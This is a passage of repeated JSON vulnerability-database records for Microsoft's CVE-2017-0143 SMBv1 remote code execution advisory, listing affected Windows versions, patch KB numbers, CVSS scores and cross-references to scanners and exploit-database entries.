"msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T04:47:39", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T06:50:12", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB3210721", "KB3205401", "KB4012216", "KB4013198", "KB3213986", "KB4012214", "KB4012217", "KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB3177186", "KB4012212", "KB4012215", "KB4012598", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T06:50:12", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "e82055c0f190318442e2f0bde68f2113", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T08:45:23", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based 